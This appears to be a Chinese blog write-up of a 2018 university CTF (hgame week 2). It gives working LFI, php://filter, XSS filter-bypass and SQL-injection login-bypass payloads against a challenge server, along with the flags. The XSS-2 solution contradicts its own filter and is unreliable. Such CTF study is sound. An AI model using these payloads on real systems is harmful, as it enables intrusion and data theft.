您的位置:首页 > 其它

hgame-2018 CTFwp(杭电信安)week2

2018-03-04 13:42 721 查看

草莓社区-1

描述

flag在../flag.php中

知识点:LFI

URL http://118.25.18.223:10011/

基准分数 100

当前分数 100

完成人数 118

提示很清楚,简单的本地包含:

payload: http://118.25.18.223:10011/show_maopian.php?mao=../flag.php



一开始以为不对,F12找了源文件,发现flag的base64码。解得:

>>> import base64
>>> base64.b64decode("PD9waHAKCSRmbGFnPSJoZ2FtZXsjTWEwX3BpNG5faGFPX2s0bl9tYSN9IjsK")
b'<?php\n\t$flag="hgame{#Ma0_pi4n_haO_k4n_ma#}";\n'


草莓社区- 2

描述

flag在../flag.php中

知识点:LFI

URL http://118.25.18.223:10012/

基准分数 150

当前分数 150

完成人数 103

和上一题肯定不一样咯。试了试

http://118.25.18.223:10012/show_maopian.php?mao=php://filter/read=convert.base64-encode/resource=show_maopian.php


读取php。发现可行。

读取../flag.php试试。



>>> base64.b64decode("UEQ5d2FIQUtDU1JtYkdGblBTSm9aMkZ0WlhzaGJUUnZYM0JwTkc1ZlEyaGhUMTlvWVc5ZmEyRnVJWDBpT3dvPQ==")
b'PD9waHAKCSRmbGFnPSJoZ2FtZXshbTRvX3BpNG5fQ2hhT19oYW9fa2FuIX0iOwo='
>>> base64.b64decode("PD9waHAKCSRmbGFnPSJoZ2FtZXshbTRvX3BpNG5fQ2hhT19oYW9fa2FuIX0iOwo=")
b'<?php\n\t$flag="hgame{!m4o_pi4n_ChaO_hao_kan!}";\n'


xss-1

function charge(input) {
input = input.replace(/script/gi, '_');
input = input.replace(/image/gi, '_');
input = input.replace(/\(/, '_');

return '<article>' + input + '</article>';
}


/gi 忽略大小写,全文匹配。

过滤了srcipt,image,( 。

于是想用错误事件。

payload:

<img src=x  onerror=alert(1);>


flag: hgame{#X5s_soo00o_e4sy#}

XSS-2

function charge(input) {
input = input.replace(/script/gi, '_');
input = input.replace(/img/gi, '_');
input = input.replace(/image/gi, '_');
input = input.replace(/\(/, '_');
input = input.replace(/\>/,'_');
return '<input value="' + input + '" type="text">';
}


过滤了script, img, image, (, >,

我一看想着,直接用Unicode算了。

payload:

<script>alert(1);</script>


flag: hgame{#LuCkY_y0u_a1ert_l#}

最简单的sql题

太简单了,直接万能密码就行:

admin' or 1=1 --


flag: hgame{@s0ng_fen_ti@}
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: